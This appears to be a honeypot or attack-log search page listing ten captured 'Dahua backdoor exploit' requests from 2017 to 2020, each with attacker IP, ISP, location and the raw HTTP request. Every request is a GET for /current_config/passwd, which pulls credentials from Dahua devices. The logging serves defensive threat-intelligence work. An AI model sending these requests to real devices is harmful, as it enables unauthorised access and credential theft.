This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-10 of 10 results (1 page)

Dahua backdoor exploit

[Attack info]
Attacker: 27.224.137.203
Dest. port: 8080
Time: 06/09/2020 02:37:17
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4134 CHINANET-BACKBONE
Location: Gansu, Lanzhou
GET /current_config/passwd HTTP/1.1 Host: 176.94.18.109:8080 referer: http://176.94.18.109:8080/ accept-encoding: gzip, deflate Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Dahua backdoor exploit

[Attack info]
Attacker: 110.83.33.42
Dest. port: 8080
Time: 02/08/2020 02:35:33
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4134 CHINANET-BACKBONE
Location: Fujian, Fuzhou
rDNS: 42.33.83.110.broad.fz.fj.dynamic.163data.com.cn
GET /current_config/passwd HTTP/1.1 Host: 102.252.124.187:8080 referer: http://102.252.124.187:8080/ accept-encoding: gzip, deflate Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Dahua backdoor exploit

[Attack info]
Attacker: 36.47.161.124
Dest. port: 80
Time: 11/07/2019 03:19:10
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4134 No.31,Jin-rong Street
Location: Shaanxi, Xincheng
GET /current_config/passwd HTTP/1.1 Host: 140.63.141.60 accept-encoding: identity

Dahua backdoor exploit

[Attack info]
Attacker: 112.80.211.238
Dest. port: 80
Time: 24/01/2019 21:22:43
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Jiangsu, Nanjing
GET /current_config/passwd HTTP/1.1 Host: 38.117.58.8 accept-encoding: identity

Dahua backdoor exploit

[Attack info]
Attacker: 106.47.100.97
Dest. port: 80
Time: 15/08/2018 21:14:22
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS17638 ASN for TIANJIN Provincial Net of CT
Location: Tianjin, Tianjin
GET /current_config/passwd HTTP/1.1 Host: 210.52.25.245 accept-encoding: identity

Dahua backdoor exploit

[Attack info]
Attacker: 106.47.31.243
Dest. port: 80
Time: 25/04/2018 15:51:40
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS17638 ASN for TIANJIN Provincial Net of CT
Location: Tianjin, Tianjin
GET /current_config/passwd HTTP/1.1 Host: 52.182.14.212 accept-encoding: identity

Dahua backdoor exploit

[Attack info]
Attacker: 60.191.38.77
Dest. port: 80
Time: 23/03/2017 08:36:04
Resource(s):
Request: permalink
[Extra info]
No extra information available
GET /current_config/passwd HTTP/1.1 accept-encoding: identity x-request: JSON Host: 114.255.167.162 Accept: */* User-Agent: Mozilla/5.0 connection: keep-alive x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Dahua backdoor exploit

[Attack info]
Attacker: 183.129.160.229
Dest. port: 80
Time: 22/03/2017 20:03:09
Resource(s):
Request: permalink
[Extra info]
No extra information available
GET /current_config/passwd HTTP/1.1 accept-encoding: identity x-request: JSON Host: 114.255.167.162 Accept: */* User-Agent: Mozilla/5.0 connection: keep-alive x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Dahua backdoor exploit

[Attack info]
Attacker: 60.191.38.77
Dest. port: 80
Time: 22/03/2017 15:05:09
Resource(s):
Request: permalink
[Extra info]
No extra information available
GET /current_config/passwd HTTP/1.1 accept-encoding: identity x-request: JSON Host: 114.255.167.162 Accept: */* User-Agent: Mozilla/5.0 connection: keep-alive x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Dahua backdoor exploit

[Attack info]
Attacker: 60.191.38.77
Dest. port: 80
Time: 22/03/2017 11:25:50
Resource(s):
Request: permalink
[Extra info]
No extra information available
GET /current_config/passwd HTTP/1.1 accept-encoding: identity x-request: JSON Host: 114.255.167.162 Accept: */* User-Agent: Mozilla/5.0 connection: keep-alive x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8